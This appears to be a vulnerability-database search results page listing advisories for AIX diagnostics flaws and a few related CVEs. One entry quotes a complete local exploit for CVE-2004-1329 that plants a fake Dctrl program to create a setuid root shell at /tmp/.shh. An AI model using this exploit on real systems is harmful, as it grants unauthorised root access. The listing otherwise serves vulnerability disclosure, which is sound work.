1850 matches found
CVE-2002-1687
Buffer overflow in the diagnostics library in AIX allows local users to "cause data and instructions to be overwritten" via a long DIAGNOSTICS environment variable...
CVE-2002-1687
CVE-2002-1687 describes a local buffer overflow in the AIX diagnostics library triggered by a long DIAGNOSTICS environment variable. Multiple sources (NVD, Red Hat, CVE list, NVD mirrors) corroborate that a local attacker could cause data and instructions to be overwritten. The impact is limited ...
CVE-2004-1329
Untrusted execution path vulnerability in the diag commands 1 lsmcode, 2 diagexec, 3 invscout, and 4 invscoutd in AIX 5.1 through 5.3 allows local users to execute arbitrary programs by modifying the DIAGNOSTICS environment variable to point to a malicious Dctrl program...
AIX 4.35.1 5.3 - lsmcode Execution Privilege Escalation
AIX 4.35.1 5.3 - lsmcode Execution Privilege Escalation mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...
Immunity Canvas: CVE_2004_1329
Name| CVE20041329 ---|--- CVE| CVE-2004-1329 Exploit Pack| CANVAS Description| CVE-2004-1329: DIAGNOSTICS environment handling Notes| CVE Name: CVE-2004-1329 VENDOR: IBM VersionsAffected: 5.X Repeatability: unlimited CVE URL: https://vulners.com/cve/CVE-2004-1329 CVSS: 7.2...
CVE-2004-1329
Untrusted execution path vulnerability in the diag commands 1 lsmcode, 2 diagexec, 3 invscout, and 4 invscoutd in AIX 5.1 through 5.3 allows local users to execute arbitrary programs by modifying the DIAGNOSTICS environment variable to point to a malicious Dctrl program...
IBM AIX 5.x - 'Diag' Local Privilege Escalation
source: https://www.securityfocus.com/bid/12041/info diag is reported prone to a local privilege escalation vulnerability. This issue is due to a failure of certain diag applications to properly implement security controls when executing an application specified by the 'DIAGNOSTICS' environment...
CVE-2002-1687
Buffer overflow in the diagnostics library in AIX allows local users to "cause data and instructions to be overwritten" via a long DIAGNOSTICS environment variable...
LBL Traceroute 1.4 a5 - Heap Corruption (2)
// source: https://www.securityfocus.com/bid/1739/info Traceroute is a well-known network diagnostic tool used for analyzing the path on a network between two hosts. On unix systems, traceroute is typically installed setuid root because of its use of raw sockets. Certain versions of LBNL tracerou...
Security update for the Diagnostic Hub Standard Collector elevation of privilege vulnerability in Visual Studio 2015 Update 3 (KB4576950)
An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector improperly handles file and data operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context...